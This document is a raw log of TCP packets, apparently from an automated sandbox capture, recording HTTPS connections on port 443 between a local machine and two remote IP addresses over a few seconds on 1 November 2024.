Nov 1, 2024 10:50:59.518492937 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.518615007 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.518625975 CET	443	49753	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.519025087 CET	49744	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.519030094 CET	443	49744	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.521545887 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.521619081 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.521661997 CET	49748	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.521764040 CET	49748	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.521776915 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.521790028 CET	49748	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.521795034 CET	443	49748	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.523789883 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.523799896 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:50:59.523860931 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.523983955 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:50:59.523993015 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.047703981 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.047772884 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.047842026 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.047949076 CET	49749	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.047967911 CET	443	49749	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.118029118 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.118066072 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.118140936 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.118428946 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.118444920 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.244208097 CET	443	49753	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.246697903 CET	443	49750	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.249892950 CET	443	49751	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.251821041 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.289554119 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.300293922 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.300298929 CET	49751	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.300301075 CET	49750	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.302115917 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.302128077 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.302624941 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.302628994 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.302769899 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.302778006 CET	443	49753	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.303078890 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.303082943 CET	443	49753	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.303246975 CET	49750	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.303260088 CET	443	49750	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.303544998 CET	49750	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.303550959 CET	443	49750	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.303713083 CET	49751	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.303719044 CET	443	49751	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.303997040 CET	49751	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.304001093 CET	443	49751	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.346880913 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.351660013 CET	49752	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.351669073 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.355026007 CET	49752	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.355030060 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.427496910 CET	443	49753	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.427550077 CET	443	49750	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.427664042 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.427670002 CET	443	49753	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.427717924 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.427736998 CET	443	49750	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.427786112 CET	49750	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.427830935 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.427874088 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.430999994 CET	443	49751	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.431221962 CET	443	49751	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.431263924 CET	49751	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.454916000 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.454926014 CET	443	49753	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.454942942 CET	49753	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.454947948 CET	443	49753	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.457304955 CET	49751	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.457314968 CET	443	49751	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.463217974 CET	49750	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.463232040 CET	443	49750	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.471693039 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.471693039 CET	49754	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.471707106 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.471714973 CET	443	49754	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.482930899 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.483031988 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.483107090 CET	49752	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.503921032 CET	49752	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.503921032 CET	49752	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.503926992 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.503933907 CET	443	49752	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.520658016 CET	49756	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.520688057 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.520747900 CET	49756	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.532958031 CET	49757	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.532979012 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.533071995 CET	49757	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.536815882 CET	49756	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.536829948 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.542376995 CET	49758	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.542386055 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.542438030 CET	49758	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.552798986 CET	49758	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.552814960 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.552938938 CET	49757	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.552951097 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.558132887 CET	49759	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.558146954 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.558202028 CET	49759	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.558444977 CET	49759	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.558454990 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.563610077 CET	49760	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.563640118 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.563688040 CET	49760	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.563848019 CET	49760	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:00.563862085 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:00.724261045 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.724340916 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.725428104 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.725435019 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.725634098 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.726730108 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.726851940 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.726877928 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:00.726943970 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:00.726953983 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:01.265769958 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.266189098 CET	49756	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.266206980 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.266592026 CET	49756	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.266597033 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.294015884 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.294312954 CET	49758	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.294322014 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.294672012 CET	49758	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.294676065 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.298851967 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.299014091 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.299257040 CET	49759	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.299272060 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.299364090 CET	49757	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.299370050 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.299618959 CET	49759	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.299623013 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.299741983 CET	49757	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.299745083 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.304678917 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.304955959 CET	49760	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.304971933 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.305308104 CET	49760	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.305311918 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.407624006 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.407764912 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.407823086 CET	49756	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.407902002 CET	49756	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.407927036 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.407939911 CET	49756	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.407946110 CET	443	49756	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.410551071 CET	49761	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.410586119 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.410655022 CET	49761	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.410787106 CET	49761	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.410798073 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.422581911 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.422775984 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.422837973 CET	49758	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.422873020 CET	49758	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.422877073 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.422883987 CET	49758	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.422887087 CET	443	49758	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.424371958 CET	49762	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.424407959 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.424469948 CET	49762	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.424575090 CET	49762	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.424588919 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.429656982 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.429909945 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.429924011 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.429969072 CET	49759	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.429995060 CET	49759	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.430002928 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.430013895 CET	49759	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.430018902 CET	443	49759	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.430186987 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.430233955 CET	49757	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.430260897 CET	49757	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.430264950 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.430289030 CET	49757	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.430291891 CET	443	49757	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.431863070 CET	49763	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.431871891 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.431925058 CET	49763	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.432008982 CET	49763	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.432017088 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.432017088 CET	49764	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.432054043 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.432106018 CET	49764	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.432173014 CET	49764	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.432183981 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.436806917 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.436916113 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.436973095 CET	49760	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.436992884 CET	49760	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.437005997 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.437014103 CET	49760	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.437016964 CET	443	49760	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.438549995 CET	49765	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.438568115 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.438635111 CET	49765	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.438723087 CET	49765	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:01.438730955 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:01.562561035 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:01.562628031 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:01.562673092 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:01.562747002 CET	49755	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:01.562757969 CET	443	49755	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:01.652616978 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:01.652638912 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:01.652713060 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:01.652947903 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:01.652964115 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:02.139780045 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.141623974 CET	49761	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.141644001 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.142026901 CET	49761	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.142031908 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.175271034 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.177517891 CET	49763	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.177525043 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.177963018 CET	49763	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.177967072 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.179289103 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.179533958 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.179546118 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.179785967 CET	49765	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.179804087 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.179891109 CET	49764	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.179918051 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.180135965 CET	49765	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.180140018 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.180258036 CET	49764	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.180264950 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.180375099 CET	49762	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.180401087 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.180663109 CET	49762	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.180668116 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.250907898 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:02.250998020 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:02.251991987 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:02.251997948 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:02.252192020 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:02.253226042 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:02.253303051 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:02.253308058 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:02.269658089 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.269779921 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.269846916 CET	49761	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.269979954 CET	49761	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.269993067 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.270005941 CET	49761	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.270009995 CET	443	49761	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.272095919 CET	49767	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.272114992 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.272178888 CET	49767	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.272288084 CET	49767	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.272298098 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.305360079 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.305493116 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.305537939 CET	49763	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.305617094 CET	49763	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.305620909 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.305643082 CET	49763	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.305645943 CET	443	49763	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.307519913 CET	49768	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.307543039 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.307739019 CET	49768	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.307825089 CET	49768	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.307842016 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.309614897 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.309845924 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.309911013 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.309912920 CET	49764	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.310008049 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.310014009 CET	49764	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.310028076 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.310041904 CET	49765	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.310044050 CET	49764	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.310050011 CET	443	49764	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.310513973 CET	49765	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.310519934 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.310550928 CET	49765	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.310554981 CET	443	49765	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.312514067 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.312596083 CET	49769	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.312609911 CET	443	49769	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.312664986 CET	49769	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.312673092 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.312772989 CET	49769	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.312787056 CET	443	49769	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.312819958 CET	49762	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.312843084 CET	49762	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.312855005 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.312881947 CET	49762	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.312886953 CET	443	49762	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.313302040 CET	49770	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.313312054 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.313616991 CET	49770	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.313755035 CET	49770	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.313770056 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.314652920 CET	49771	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.314660072 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.314811945 CET	49771	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.314927101 CET	49771	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:02.314935923 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:02.968030930 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:02.968108892 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:02.968163013 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:02.968838930 CET	49766	443	192.168.2.4	104.21.85.194
Nov 1, 2024 10:51:02.968849897 CET	443	49766	104.21.85.194	192.168.2.4
Nov 1, 2024 10:51:02.998425961 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.003552914 CET	49767	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.003561974 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.003936052 CET	49767	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.003941059 CET	443	49767	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.051235914 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.053677082 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.054095984 CET	443	49769	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.054100990 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.059644938 CET	49771	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.059655905 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.093805075 CET	49771	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.093810081 CET	443	49771	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.094103098 CET	49768	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.094118118 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.094434023 CET	49768	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.094439030 CET	443	49768	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.094600916 CET	49770	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.094614983 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.094898939 CET	49770	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.094903946 CET	443	49770	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.095072031 CET	49769	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.095078945 CET	443	49769	13.107.246.45	192.168.2.4
Nov 1, 2024 10:51:03.095352888 CET	49769	443	192.168.2.4	13.107.246.45
Nov 1, 2024 10:51:03.095356941 CET	443	49769	13.107.246.45	192.168.2.4
